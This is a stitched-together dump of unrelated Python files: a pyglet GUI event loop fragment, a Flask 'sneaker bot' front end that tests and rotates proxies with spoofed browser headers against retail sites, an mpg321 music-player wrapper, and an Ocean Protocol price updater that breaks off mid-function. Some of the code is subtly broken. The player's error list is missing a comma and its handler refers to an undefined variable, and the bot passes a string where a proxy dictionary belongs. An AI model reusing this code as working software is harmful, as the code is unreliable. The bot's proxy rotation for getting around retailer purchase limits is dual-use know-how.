updatewithfocus = lambda dt: world.update(dt, gui.get_focus())
pyglet.clock.schedule(updatewithfocus)
@win.event
def on_draw():
pyglet.clock.tick()
gui.update()
win.clear()
gui.draw_world()
@win.event
def on_key_press(symbol, modifiers):
if symbol == pyglet.window.key.LEFT:
gui.add_translate(-GUI.SCROLL_SPEED, 0)
elif symbol == pyglet.window.key.RIGHT:
gui.add_translate(GUI.SCROLL_SPEED, 0)
elif symbol == pyglet.window.key.UP:
gui.add_translate(0, GUI.SCROLL_SPEED)
elif symbol == pyglet.window.key.DOWN:
gui.add_translate(0, -GUI.SCROLL_SPEED)
elif symbol == pyglet.window.key.Q:
gui.set_zoom(1. / GUI.ZOOM_SPEED)
elif symbol == pyglet.window.key.E:
gui.set_zoom(GUI.ZOOM_SPEED)
elif symbol == pyglet.window.key.D:
gui.set_debug(not gui.debug)
@win.event
def on_key_release(symbol, modifiers):
if symbol == pyglet.window.key.LEFT:
gui.add_translate(GUI.SCROLL_SPEED, 0)
elif symbol == pyglet.window.key.RIGHT:
gui.add_translate(-GUI.SCROLL_SPEED, 0)
elif symbol == pyglet.window.key.UP:
gui.add_translate(0, -GUI.SCROLL_SPEED)
elif symbol == pyglet.window.key.DOWN:
gui.add_translate(0, GUI.SCROLL_SPEED)
elif symbol == pyglet.window.key.Q:
gui.set_zoom(1)
elif symbol == pyglet.window.key.E:
gui.set_zoom(1)
@win.event
def on_mouse_press(x, y, button, modifiers):
if button == pyglet.window.mouse.LEFT:
print('The left mouse button was pressed: {},{}'.format(x, y))
gui.selectnear(x,y)
@win.event
def on_resize(width, height):
gui.resize(width, height)
pyglet.app.run()
finally:
print("Cleaning up...")
running = False
if not SINGLE_THREAD:
t.join()
world.cleanup()
|
app.py | #import versionCheck
#^This fixes a really common problem I'm getting messages about. It checks for
#python 2.x
from flask import Flask, render_template, request, url_for, redirect, Markup, jsonify, make_response, send_from_directory, session
import requests
import sys
import bs4
import RandomHeaders
import re
import urllib
import threading
import time
import main
import csv
from time import gmtime, strftime
app = Flask(__name__, static_url_path='/static')
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
PROXIES = []
sessionInfo = {}
bot = main.bot([])
#bot is initated with a LIST of STRINGS for proxies... not dicts
# No caching at all for API endpoints.
@app.after_request
def add_header(r):
"""
Add headers to both force latest IE rendering engine or Chrome Frame,
and also to cache the rendered page for 10 minutes.
"""
r.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
r.headers["Pragma"] = "no-cache"
r.headers["Expires"] = "0"
r.headers['Cache-Control'] = 'public, max-age=0'
return r
def configure_proxy_settings(ip, port, username=None, password=None):
"""
Configuring proxies to pass to request
:param ip: The IP address of the proxy you want to connect to ie 127.0.0.1
:param port: The port number of the prxy server you are connecting to
:param username: The username if requred authentication, need to be accompanied with a `password`.
Will default to None to None if not provided
:param password: The password if required for authentication. Needs to be accompanied by a `username`
Will default to None if not provided
:return: A dictionary of proxy settings
"""
proxies = None
credentials = ''
# If no IP address or port information is passed, in the proxy information will remain `None`
# If no proxy information is set, the default settings for the machine will be used
if ip is not None and port is not None:
# Username and password not necessary
if username is not None and password is not None:
credentials = '{}:{}@'.format(username, password)
proxies = {'http': 'http://{credentials}{ip}:{port}'.format(credentials=credentials, ip=ip, port=port),
'https': 'https://{credentials}{ip}:{port}'.format(credentials=credentials, ip=ip, port=port)
}
return proxies
def getPing(url, ip, port, timeout=8):
#If someone could make a better implementation of this that would be awesome
proxies = None
proxies = configure_proxy_settings(ip, port)
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.9'
}
start = time.time()
nf = requests.get(url, proxies='{}:{}'.format(ip, port), headers=headers, timeout=timeout)
page = nf.content
nf.close()
end = time.time()
return format((end - start), '.5f')
def returnTime():
#I know this doesn't adjust for local time - will fix this soon
return strftime("%H:%M:%S", gmtime())
def massTestProxies(listOfProxies):
RESPONSE = []
def addToList(proxy):
try:
print("testing proxy: {}".format(proxy))
proxyInfo = {}
ip = proxy.partition(":")[0]
port = proxy.partition(':')[2]
url = 'http://www.adidas.com/'
proxyInfo['IP'] = ip
proxyInfo['Port'] = port
proxyInfo['Ping'] = getPing('https://whatismyipaddress.com/', ip=ip, port=port)
proxyInfo['ConnectTime'] = returnTime()
RESPONSE.append(proxyInfo)
print("done: {}".format(proxy))
except Exception as exp:
print(exp)
print("proxy: {} failed".format(proxy))
return
threads = [threading.Thread(target=addToList, args=(proxy,)) for proxy in listOfProxies]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return RESPONSE
def returnProxies(csvpath):
with open(csvpath, 'rb') as f:
reader = csv.reader(f)
return list(reader)
def getCommits():
for i in range(5):
try:
url = 'https://github.com/theriley106/SneakerBotTutorials'
res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'})
page = bs4.BeautifulSoup(res.text, 'lxml')
#print page.title.string
#commitsCount = page.select('.commits a')
updateCount = str(page).partition('<span class="num text-emphasized">')[2].partition("<")[0].strip()
lastUpdate = page.select('relative-time')[0].getText()
#updateCount = int(re.findall('\d+', str(commitsCount[0].getText()))[0])
if len(updateCount) > 2:
return [lastUpdate, updateCount]
except Exception as exp:
print(exp)
return "ERROR"
@app.route('/changeHeader', methods=['POST'])
def headerChange():
#this is only printing the headers, but this will eventually change headers
#print str(list(request.form.items())[0][1])
bot.updateHeader(str(list(request.form.items())[0][1]))
return redirect(url_for('useBot'))
#perhaps it would be better to have default variables set for index, and this will edit default variables?
# ie: index(headers=None, url=None, etc)
@app.route('/goToURL', methods=['POST'])
def goToURL():
#this is only printing the headers, but this will eventually change headers
#print str(list(request.form.items())[0][1])
bot.sendAllToURL(url=str(list(request.form.items())[0][1]))
return redirect(url_for('useBot'))
@app.route('/openDriver', methods=['POST'])
def driverAdd():
bot.startAllDrivers()
@app.route('/', methods=['GET'])
def index():
gitCommits = getCommits()
print(gitCommits)
sessionInfo['lastUpdate'] = gitCommits[0]
sessionInfo['gitCommits'] = gitCommits[1]
sessionInfo['info'] = massTestProxies(PROXIES)
print("Done mass test")
bot.startAllDrivers()
return redirect(url_for('useBot'))
@app.route('/botInfo', methods=['GET'])
def useBot():
proxyLists = []
for proxy in bot.successProxies:
proxyLists.append(proxy.partition(':')[0])
return render_template("index.html", gitCommits=sessionInfo['gitCommits'], lastUpdate=sessionInfo['lastUpdate'], URL=bot.targetURL, proxyInfo=sessionInfo['info'], driverInfo=bot.returnDriverInfo(), proxyDiff=len(bot.failedProxies), allProxies=proxyLists)
@app.route('/test', methods=['GET'])
def testTemplate():
return render_template("index.html", gitCommits=100, lastUpdate='Dec 3', proxyInfo=[{"IP": '41', "Port": '41', "Ping": '132', "ConnectTime": '321'}], driverInfo=[{'proxy': 'proxy', 'driver': 'driver', 'url': 'url', 'useragent': 'self.headers'}], proxyDiff=4)
if __name__ == '__main__':
if len(sys.argv) > 1:
if '.csv' in str(sys.argv[1]):
PROXIES = returnProxies(sys.argv[1])
if len(sys.argv) > 1 and '.csv' not in str(sys.argv[1]):
for proxy in sys.argv[1:]:
PROXIES.append(proxy)
for proxy in PROXIES:
bot.addProxy(proxy)
print("Initiating Bot with Proxy: {}".format(proxy))
else:
print("It looks like you didn't input any Proxies.")
if input("It is HIGHLY recommended that you use proxies. Continue without? [Y/N] ").lower() == 'n':
raise Exception("Input Proxies...")
if 'admin' in str(sys.argv).lower():
r = requests.post("http://138.197.123.15:8888/proxies/{}".format(open('../../SecretCode.txt').read().strip())).json()
PROXIES = r["proxies"][-10:]
try:
bot = main.bot(PROXIES)
except:
if input("You need to install PhantomJS to use this program. Continue without? [Y/N ").lower() == 'n':
raise Exception("Install PhantomJS...")
app.run(host='127.0.0.1', port=8000) |
mpyg321.py | import pexpect
from threading import Thread
mpg_outs = [
{
"mpg_code": "@P 0",
"action": "user_stop",
"description": "Music has been stopped by the user."
},
{
"mpg_code": "@P 1",
"action": "user_pause",
"description": "Music has been paused by the user."
},
{
"mpg_code": "@P 2",
"action": "user_resume",
"description": "Music has been resumed by the user."
},
{
"mpg_code": "@P 3",
"action": "end_of_song",
"description": "Player has reached the end of the song."
},
{
"mpg_code": "@E *",
"action": "error",
"description": "Player has encountered an error."
}
]
mpg_codes = [v["mpg_code"] for v in mpg_outs]
mpg_errors = [
{
"message": "empty list name",
"action": "generic_error"
},
{
"message": "No track loaded!",
"action": "generic_error"
}
{
"message": "Error opening stream",
"action": "file_error"
},
{
"message": "failed to parse given eq file:",
"action": "file_error"
},
{
"message": "Corrupted file:",
"action": "file_error"
},
{
"message": "Unknown command:",
"action": "command_error"
},
{
"message": "Unfinished command:",
"action": "command_error"
},
{
"message": "Unknown command or no arguments:",
"action": "argument_error"
},
{
"message": "invalid arguments for",
"action": "argument_error"
},
{
"message": "Missing argument to",
"action": "argument_error"
},
{
"message": "failed to set eq:",
"action": "eq_error"
},
{
"message": "Error while seeking",
"action": "seek_error"
},
]
# # # Errors # # #
class MPyg321PlayerError(RuntimeError):
"""Base class for any errors encountered by the player during runtime"""
pass
class MPyg321PlayerFileError(MPyg321PlayerError):
"""Errors encountered by the player related to files"""
pass
class MPyg321PlayerCommandError(MPyg321PlayerError):
"""Errors encountered by the player related to player commands"""
pass
class MPyg321PlayerArgumentError(MPyg321PlayerError):
"""Errors encountered by the player related to arguments for commands"""
pass
class MPyg321PlayerEQError(MPyg321PlayerError):
"""Errors encountered by the player related to the equalizer"""
pass
class MPyg321PlayerSeekError(MPyg321PlayerError):
"""Errors encountered by the player related to the seek"""
pass
class PlayerStatus:
INSTANCIATED = 0
PLAYING = 1
PAUSED = 2
STOPPED = 3
QUITTED = 4
class MPyg321Player:
"""Main class for mpg321 player management"""
player = None
status = None
output_processor = None
def __init__(self):
"""Builds the player and creates the callbacks"""
try:
self.player = pexpect.spawn("mpg321 -R somerandomword",
timeout=None)
except pexpect.actions.ExceptionPexpect:
try:
self.player = pexpect.spawn("mpg123 -R somerandomword",
timeout=None)
except pexpect.actions.ExceptionPexpect:
raise FileNotFoundError("""\
No suitable command found. Please install mpg321 or mpg123 and try again.""")
self.status = PlayerStatus.INSTANCIATED
self.output_processor = Thread(target=self.process_output)
self.output_processor.daemon = True
self.output_processor.start()
def process_output(self):
"""Parses the output"""
while True:
index = self.player.expect(mpg_codes)
action = mpg_outs[index]["action"]
if action == "user_stop":
self.on_any_stop()
self.on_user_stop()
if action == "user_pause":
self.on_any_stop()
self.on_user_pause()
if action == "user_resume":
self.on_user_resume()
if action == "end_of_song":
self.on_any_stop()
self.on_music_end()
if action == "error":
self.process_errors()
def play_song(self, path):
"""Plays the song"""
self.player.sendline("LOAD " + path)
self.status = PlayerStatus.PLAYING
def pause(self):
"""Pauses the player"""
if self.status == PlayerStatus.PLAYING:
self.player.sendline("PAUSE")
self.status = PlayerStatus.PAUSED
def resume(self):
"""Resume the player"""
if self.status == PlayerStatus.PAUSED:
self.player.sendline("PAUSE")
self.status = PlayerStatus.PLAYING
def stop(self):
"""Stops the player"""
self.player.sendline("STOP")
self.status = PlayerStatus.STOPPED
def quit(self):
"""Quits the player"""
self.player.sendline("QUIT")
self.status = PlayerStatus.QUITTED
def jump(self, pos):
"""Jump to position"""
self.player.sendline("JUMP " + str(pos))
def process_errors(self):
"""Process errors encountered by the player"""
output = self.player.readline().decode("utf-8")
# Check error in list of errors
for mpg_error in mpg_errors:
if error["message"] in output:
action = error["action"]
if action == "generic_error":
raise MPyg321PlayerError(output)
if action == "file_error":
raise MPyg321PlayerFileError(output)
if action == "command_error":
raise MPyg321PlayerCommandError(output)
if action == "argument_error":
raise MPyg321PlayerArgumentError(output)
if action == "eq_error":
raise MPyg321PlayerEQError
if action == "seek_error":
raise MPyg321PlayerSeekError
# Some other error occurred
raise MPyg321PlayerError(output)
# # # Callbacks # # #
def on_any_stop(self):
"""Callback when the music stops for any reason"""
pass
def on_user_pause(self):
"""Callback when user pauses the music"""
pass
def on_user_resume(self):
"""Callback when user resumes the music"""
pass
def on_user_stop(self):
"""Callback when user stops music"""
pass
def on_music_end(self):
"""Callback when music ends"""
pass
|
metadata_updater.py | import logging
import os
import time
from threading import Thread
import elasticsearch
from eth_utils import add_0x_prefix
from eth_utils import remove_0x_prefix
from ocean_lib.models.bfactory import BFactory
from ocean_lib.models.bpool import BPool
from ocean_lib.models.fixed_rate_exchange import FixedRateExchange
from ocean_lib.ocean.util import from_base_18, to_base_18
from ocean_lib.web3_internal.event_filter import EventFilter
from web3.utils.events import get_event_data
from aquarius.app.dao import Dao
from aquarius.events.util import (
prepare_contracts,
get_datatoken_info,
get_exchange_contract,
)
logger = logging.getLogger(__name__)
class MetadataUpdater:
"""Update price/liquidity info of all known assets.
The update happens in two stages:
1. Initial update is performed if this is ran for the first time. This is determined by
checking for a cached block number from a previous run. The initial update extracts all
Datatoken<>Ocean balancer pools by looking at the BFactory `BPoolRegistered` event. Then
each Asset in the database is updated with the liquidity/price information from the
corresponding pool.
2. Periodic update is continuously running to detect liquidity updates by looking at the
`LOG_JOIN`, `LOG_EXIT`, and `LOG_SWAP` event logs. The events are detected regardless of
the pool contract, i.e. it looks at all matching events from all BPool contracts or
even any smartcontract event that has the same signature.
See `get_dt_addresses_from_pool_logs`
Notes:
- Set the `BFACTORY_BLOCK` envvar to tell the updater which `fromBlock` to start processing
events. This should be set to the blockNumber in which the BFactory was created/deployed
- The continuous updater runs every N seconds (initially set to 20s)
- The price/liquidity info is added to the Asset's json object under the `price` key, e.g.:
asset['price'] = {
'datatoken': 90,
'ocean': 10,
'value': 0.111,
'type': 'pool',
'address': '0x12112112112...',
'pools': ['0x12112112112...', ]
}
"""
DID_PREFIX = "did:op:"
PRICE_TOO_LARGE = 1000000000
def __init__(self, oceandb, other_db_index, web3, config):
self._oceandb = oceandb
self._other_db_index = other_db_index
self._web3 = web3
self._config = config
self._addresses = prepare_contracts(self._web3, self._config)
self._checksum_ocean = self._addresses.get("Ocean")
if not self._checksum_ocean:
self._checksum_ocean = os.getenv("OCEAN_ADDRESS")
logger.debug(
f"Ocean token address: {self._checksum_ocean}, \n"
f"all deployed addresses: {self._addresses.items()}"
)
assert self._checksum_ocean, (
f"Ocean token address is not found: addresses={self._addresses.keys()}.\n"
f'Please add the "Ocean" token address in the address.json file or set the '
f"`OCEAN_ADDRESS` environment variable."
)
self._OCEAN = self._checksum_ocean.lower()
self.ex_contract = FixedRateExchange(get_exchange_contract(self._web3).address)
assert (
self.ex_contract and self.ex_contract.address
), "Failed to load FixedRateExchange contract."
self.bfactory_block = int(os.getenv("BFACTORY_BLOCK", 0))
self._do_first_update = bool(int(os.getenv("METADATA_UPDATE_ALL", 1)) == 1)
try:
self.get_last_processed_block()
# self._do_first_update = False
except Exception:
self.store_last_processed_block(self.bfactory_block)
self._is_on = False
default_quiet_time = 10
try:
self._quiet_time = os.getenv("OCN_METADATA_UPDATER_QUITE_TIME", 0)
except ValueError:
self._quiet_time = 0
self._quiet_time = max(self._quiet_time, default_quiet_time)
@property
def is_running(self):
return self._is_on
def start(self):
if self._is_on:
return
if not self._web3:
logger.error("Cannot start MetadataUpdater without a web3 instance.")
return
if self._oceandb is None:
logger.error("Cannot start MetadataUpdater without an OceanDB instance.")
return
logger.info("Starting the MetadataUpdater.")
t = Thread(target=self.run, daemon=True)
self._is_on = True
t.start()
def is_first_update_enabled(self):
return self._do_first_update
def stop(self):
self._is_on = False
def run(self):
if self._do_first_update:
self.do_update()
while True:
try:
if not self._is_on:
return
self.process_pool_events()
except (KeyError, Exception) as e:
logger.error("Error doing update of Metadata.")
logger.error(e)
raise
time.sleep(self._quiet_time)
def _get_all_assets(self):
for asset in self._oceandb.list():
try:
yield asset
except (KeyError, Exception) as e:
logging.error(str(e))
def _get_event_signature(self, contract, event_name):
e = getattr(contract.events, event_name)
if not e:
raise ValueError(
f"Event {event_name} not found in {contract.CONTRACT_NAME} contract."
)
abi = e().abi
types = [param["type"] for param in abi["inputs"]]
sig_str = f'{event_name}({",".join(types)})'
return self._web3.sha3(text=sig_str).hex()
def get_last_processed_block(self):
last_block_record = self._oceandb.driver.es.get(
index=self._other_db_index, id="pool_events_last_block", doc_type="_doc"
)["_source"]
return last_block_record["last_block"]
def store_last_processed_block(self, block):
record = {"last_block": block}
try:
self._oceandb.driver.es.index(
index=self._other_db_index,
id="pool_events_last_block",
body=record,
doc_type="_doc",
refresh="wait_for",
)["_id"]
except elasticsearch.exceptions.RequestError as e:
logger.error(
f"store_last_processed_block: block={block} type={type(block)}, error={e}"
)
def get_dt_addresses_from_exchange_logs(self, from_block, to_block=None):
contract = FixedRateExchange(None)
event_names = ["ExchangeCreated"] # , 'ExchangeRateChanged']
topic0_list = [self._get_event_signature(contract, en) for en in event_names]
args_list = [("dataToken",)]
filters = []
to_block = to_block or "latest"
for i, event_name in enumerate(event_names):
filters.append(
{
"fromBlock": from_block,
"toBlock": to_block,
"topics": [topic0_list[i]],
}
)
events = [getattr(contract.events, en) for en in event_names]
event_abis = [e().abi for e in events]
address_exid = []
for i, _filter in enumerate(filters):
try:
logs = self._web3.eth.getLogs(_filter)
except ValueError as e:
logger.error(
f"get_dt_addresses_from_exchange_logs -> web3.eth.getLogs (filter={_filter}) failed: "
f"{e}.."
)
logs = []
if logs:
args = args_list[i]
for log in logs:
parsed_log = get_event_data(event_abis[i], log)
address_exid.extend(
[
(
parsed_log.args.get(arg, ""),
add_0x_prefix(parsed_log.args.exchangeId.hex()),
)
for arg in args
]
)
# all_logs.append(parsed_log)
return address_exid
def get_dt_addresses_from_pool_logs(self, from_block, to_block=None):
contract = BPool(None)
event_names = ["LOG_JOIN", "LOG_EXIT", "LOG_SWAP"]
topic0_list = [self._get_event_signature(contract, en) for en in event_names]
args_list = [("tokenIn",), ("tokenOut",), ("tokenIn", "tokenOut")]
filters = []
to_block = to_block or "latest"
for i, event_name in enumerate(event_names):
filters.append(
{
"fromBlock": from_block,
"toBlock": to_block,
"topics": [topic0_list[i]],
}
)
events = [getattr(contract.events, en) for en in event_names]
event_abis = [e().abi for e in events]
# all_logs = []
addresses = []
for i, _filter in enumerate(filters):
try:
logs = self._web3.eth.getLogs(_filter)
except ValueError as e:
logger.error(
f"get_dt_addresses_from_pool_logs -> web3.eth.getLogs "
f"(filter={_filter}) failed: {e}.."
)
logs = []
if logs:
args = args_list[i]
for log in logs:
parsed_log = get_event_data(event_abis[i], log)
addresses.extend(
[
(parsed_log.args.get(arg, ""), parsed_log.address)
for arg in args
]
)
# all_logs.append(parsed_log)
addresses_and_pools = [
(a, pool) if a and a.lower() != self._OCEAN else ("", pool)
for (a, pool) in addresses
]
return addresses_and_pools
def get_datatoken_pools(self, dt_address, from_block=0, to_block="latest"):
contract = BPool(None)
topic0 = self._get_event_signature(contract, "LOG_JOIN")
topic2 = f"0x000000000000000000000000{remove_0x_prefix(dt_address).lower()}"
filter_params = {
"fromBlock": from_block,
"toBlock": to_block,
"topics": [topic0, None, topic2],
}
e = getattr(contract.events, "LOG_JOIN")
event_abi = e().abi
logs = self._web3.eth.getLogs(filter_params)
if not logs:
return None
pools = {get_event_data(event_abi, log).address for log in logs}
return list(pools)
def _get_liquidity_and_price(self, pools, dt_address):
assert pools, f"pools should not be empty, got {pools}"
logger.debug(f" Searching {pools} for {dt_address}")
dt_address_lower = dt_address.lower()
pool_to_price = dict()
for _pool in pools:
try:
pool = BPool(_pool)
try:
ptokens = {a.lower() for a in pool.getCurrentTokens()}
except Exception:
continue
if self._OCEAN not in ptokens or dt_address_lower not in ptokens:
logger.debug(
f" ignore pool {_pool}, cannot find {self._OCEAN} and {dt_address_lower} in tokens list {ptokens}"
)
continue
price = from_base_18(
pool.getSpotPrice(self._checksum_ocean, dt_address)
)
if price <= 0.0 or price > self.PRICE_TOO_LARGE:
continue
pool_to_price[_pool] = price
logger.debug(f" Adding pool {_pool} with price {price}")
except Exception as e:
logger.error(
f"failed to get liquidity/price info from pool {_pool} and datatoken {dt_address}: {e}"
)
if pool_to_price:
_pool = sorted(pool_to_price.items(), key=lambda x: x[1])[0][0]
dt_reserve, ocn_reserve, price, _pool = self.get_pool_reserves_and_price(
_pool, dt_address
)
return dt_reserve, ocn_reserve, price, _pool
# no pool or no pool with price was found
return 0.0, 0.0, 0.0, pools[0]
def get_pool_reserves_and_price(self, _pool, dt_address):
pool = BPool(_pool)
dt_reserve = pool.getBalance(dt_address)
ocn_reserve = pool.getBalance(self._checksum_ocean)
price_base = pool.calcInGivenOut(
ocn_reserve,
pool.getDenormalizedWeight(self._checksum_ocean),
dt_reserve,
pool.getDenormalizedWeight(dt_address),
to_base_18(1.0),
pool.getSwapFee(),
)
price = from_base_18(price_base)
ocn_reserve = from_base_18(ocn_reserve)
dt_reserve = from_base_18(dt_reserve)
if dt_reserve <= 1.0:
price = 0.0
if price > self.PRICE_TOO_LARGE:
price = 0.0
return dt_reserve, ocn_reserve, price, _pool
def _get_fixedrateexchange_price(self, dt_address, owner=None, exchange_id=None):
fre = self.ex_contract
try:
if not exchange_id:
assert (
owner is not None
), "owner is required when `exchange_id` is not given."
exchange_id = add_0x_prefix(
fre.generateExchangeId(
self._checksum_ocean, dt_address, owner
).hex()
)
ex_data = fre.getExchange(exchange_id)
if not ex_data or not ex_data.exchangeOwner:
return None, None
price = from_base_18(ex_data.fixedRate)
supply = from_base_18(ex_data.supply)
return price, supply
except Exception as e:
logger.error(
f"Reading exchange price failed for datatoken {dt_address}, "
f"owner {owner}, exchangeId {exchange_id}: {e}"
)
return None, None
def get_all_pools(self):
bfactory = BFactory(self._addresses.get(BFactory.CONTRACT_NAME))
event_name = "BPoolRegistered"
event = getattr(bfactory.events, event_name)
latest_block = self._web3.eth.blockNumber
_from = self.bfactory_block
chunk = 10000
pools = []
while _from < latest_block:
event_filter = EventFilter(
event_name, event, None, from_block=_from, to_block=_from + chunk - 1
)
try:
logs = event_filter.get_all_entries(max_tries=10)
logs = sorted(logs, key=lambda l: l.blockNumber)
pools.extend([log.args.bpoolAddress for log in logs])
except ValueError as e:
logger.error(
f"get_all_pools BFactory {bfactory.address}, fromBlock {_from}, toBlock{_from+chunk-1}: {e}"
)
_from += chunk
return pools
def _get_price_updates_from_fixed_rate_exchange(
self, _dt_address, owner=None, exchange_id=None
):
if exchange_id:
price, dt_supply = self._get_fixedrateexchange_price(
_dt_address, exchange_id=exchange_id
)
else:
price, dt_supply = self._get_fixedrateexchange_price(
_dt_address, owner
) # noqa
logger.info(
f"Updating price for asset with address {_dt_address}, with"
f"owner={owner}"
if owner
else f"echange_id={exchange_id}, " f"from FIXED RATE EXCHANGE."
)
is_consumable = str(bool(dt_supply is not None and dt_supply > 1)).lower()
price_dict = {
"datatoken": dt_supply or 0.0,
"ocean": 0.0,
"pools": [],
"value": price or 0.0,
"isConsumable": is_consumable,
}
logger.info(
f"Setting datatoken={dt_supply or 0.0}, ocean=0.0, pools=[], "
f"value={price or 0.0}. Found dt_supply={dt_supply}, setting "
f"isConsumable={is_consumable}. "
)
if price is not None:
logger.info(
"Found price not None, setting "
f"address={self.ex_contract.address} and type as empty string."
)
price_dict.update({"address": self.ex_contract.address, "type": "exchange"})
else:
logger.info(
"Found price=None, setting address and type as empty string."
) # noqa
price_dict.update({"address": "", "type": ""})
return price_dict
def _get_price_updates_from_liquidity(self, pools, _dt_address):
dt_reserve, ocn_reserve, price, pool_address = self._get_liquidity_and_price(
pools, _dt_address
)
is_consumable = str(bool(price is not None and price > 0.0)).lower()
logger.info(
f"Updating price for asset with address {_dt_address}, with"
f" {len(pools)} pools found from LIQUIDITY AND PRICE."
f"Setting datatoken={dt_reserve}, ocean={ocn_reserve}, "
f"value={price}, type=pool, address={pool_address}"
f"isConsumable={is_consumable}. "
)
return {
"datatoken": dt_reserve,
"ocean": ocn_reserve,
"value": price,
"type": "pool",
"address": pool_address,
"pools": pools,
"isConsumable": is_consumable,
}
def do_single_update(self, asset):
did_prefix = self.DID_PREFIX
prefix_len = len(did_prefix)
did = asset["id"]
if not did.startswith(did_prefix):
return
dt_address = add_0x_prefix(did[prefix_len:])
_dt_address = self._web3.toChecksumAddress(dt_address)
pools = self.get_datatoken_pools(dt_address, from_block=self.bfactory_block)
if pools:
logger.info(
f"Found pools for asset with address={_dt_address}, "
f"Updating price from LIQUIDITY AND PRICE."
)
price_dict = self._get_price_updates_from_liquidity(pools, _dt_address)
else:
owner = asset["proof"].get("creator")
if not owner or not self._web3.isAddress(owner):
logger.warning(
f"updating price info for datatoken {dt_address} failed, invalid owner from ddo.proof (owner={owner})."
)
return
logger.info(
f"NO pools found for asset with address={_dt_address}. "
f"Updating price from FIXED RATE EXCHANGE."
)
price_dict = self._get_price_updates_from_fixed_rate_exchange(
dt_address, owner
)
asset["price"].update(price_dict)
try:
dt_info = get_datatoken_info(_dt_address)
except Exception as e:
logger.error(
f"getting datatoken info failed for datatoken {_dt_address}: {e}"
)
dt_info = {}
asset["dataTokenInfo"] = dt_info
logger.info(
f"doing single asset update: datatoken {dt_address}, pools {pools}, price-info {price_dict}"
)
self._oceandb.update(asset, did)
def do_update(self):
did_prefix = self.DID_PREFIX
prefix_len = len(did_prefix)
pools = self.get_all_pools()
dt_to_pool = dict()
for pool_address in pools:
pool = BPool(pool_address)
try:
ptokens = pool.getCurrentTokens()
except Exception:
continue
if len(ptokens) != 2 or ptokens[1].lower() != self._OCEAN:
continue
dt = add_0x_prefix(ptokens[0]).lower()
if dt not in dt_to_pool:
dt_to_pool[dt] = []
dt_to_pool[dt].append(pool_address)
for asset in self._get_all_assets():
did = asset.get("id", None)
if not did:
logger.debug(f"db asset without id: {asset}")
continue
if not did.startswith(did_prefix):
logger.warning(
f"skipping price info update for asset {did} because the did is invalid."
)
continue
dt_address = add_0x_prefix(did[prefix_len:])
_dt_address = self._web3.toChecksumAddress(dt_address)
dt_address = dt_address.lower()
pools = dt_to_pool.get(dt_address, [])
if not pools:
logger.info(
f"NO pools found for asset with address={_dt_address}. "
f"Updating price from FIXED RATE EXCHANGE."
)
owner = asset["proof"].get("creator")
if not owner or not self._web3.isAddress(owner):
logger.warning(
f"updating price info for datatoken {dt_address} failed, invalid owner from ddo.proof (owner={owner})."
)
continue
price_dict = self._get_price_updates_from_fixed_rate_exchange(
_dt_address, owner
)
else:
logger.info(
f"Found pools for asset with address={_dt_address}, "
f"Updating price from LIQUIDITY AND PRICE."
)
price_dict = self._get_price_updates_from_liquidity(pools, _dt_address)
asset["price"].update(price_dict)
try:
dt_info = get_datatoken_info(_dt_address)
except Exception as e:
logger.error(
f"getting datatoken info failed for datatoken {_dt_address}: {e}"
)
dt_info = {}
asset["dataTokenInfo"] = dt_info
logger.info(
f"updating price info for datatoken: {dt_address}, pools {pools}, price-info {price_dict}"
)
self._oceandb.update(asset, did)
def update_dt_assets_with_exchange_info(self, dt_address_exid):
did_prefix = self.DID_PREFIX
dao = Dao(oceandb=self._oceandb)
seen_exs = set()
for address, exid in dt_address_exid:
if not address or exid in seen_exs:
continue
seen_exs.add(exid)
logger.info(
f"updating price info for datatoken: {address}, exchangeId {exid}"
)
did = did_prefix + remove_0x_prefix(address)
try:
asset = dao.get(did)
_price_dict = asset.get("price", {})
_pools = _price_dict.get("pools", [])
if _price_dict.get("type") == "pool" and _pools:
# skip if the asset has pools
continue
_dt_address = self._web3.toChecksumAddress(address)
logger.info(
f"Found asset with exchange info address={_dt_address}, "
"Updating price from FIXED RATE EXCHANGE. "
"Not searching for pools."
)
price_dict = self._get_price_updates_from_fixed_rate_exchange(
_dt_address, exchange_id=exid
)
asset["price"].update(price_dict)
asset["dataTokenInfo"] = get_datatoken_info(_dt_address)
self._oceandb.update(asset, did)
logger.info(
f"updated price info: dt={address}, exchangeAddress={self.ex_contract.address}, "
f'exchangeId={exid}, price={asset["price"]}'
)
except Exception as e:
logger.error(
f"updating datatoken assets price values from exchange contract: {e}"
)
def update_dt_assets(self, dt_address_pool_list):
did_prefix = self.DID_PREFIX
dao = Dao(oceandb=self._oceandb)
_dt_address_pool_list = []
seen_pools = set()
for address, pool_address in dt_address_pool_list:
if pool_address in seen_pools:
continue
seen_pools.add(pool_address)
if not address:
address = BPool(pool_address).getCurrentTokens()[0]
_dt_address_pool_list.append((address, pool_address))
dt_to_pools = {a: [] for a, p in _dt_address_pool_list}
for address, pool_address in _dt_address_pool_list:
dt_to_pools[address].append(pool_address)
asset = None
for address, pools in dt_to_pools.items():
did = did_prefix + remove_0x_prefix(address)
try:
asset = dao.get(did)
except Exception as e:
logger.debug(f"asset not found for token address {address}: {e}")
continue
logger.info(f"updating price info for datatoken: {address}, pools {pools}")
try:
_price_dict = asset.get("price", {})
_pools = _price_dict.get("pools", [])
_dt_address = self._web3.toChecksumAddress(address)
_pools.extend([p for p in pools if p not in _pools])
logger.debug(f"Pools to be checked: {_pools}")
logger.info(
f"Found asset with exchange info address={_dt_address}, "
"Updating price from LIQUIDITY AND PRICE. "
f"Pools are assumed to exist ({len(_pools)}) found)."
)
price_dict = self._get_price_updates_from_liquidity(_pools, _dt_address)
asset["price"].update(price_dict)
asset["dataTokenInfo"] = get_datatoken_info(_dt_address)
self._oceandb.update(asset, did)
logger.info(
f'updated price info: dt={address}, pool={pool_address}, price={asset["price"]}'
)
except Exception as e:
logger.error(f"updating datatoken assets price/liquidity values: {e}")
def process_pool_events(self):
try:
last_block = self.get_last_processed_block()
except Exception as e:
logger.warning(f"exception thrown reading last_block from db: {e}")
last_block = 0
block = self._web3.eth.blockNumber
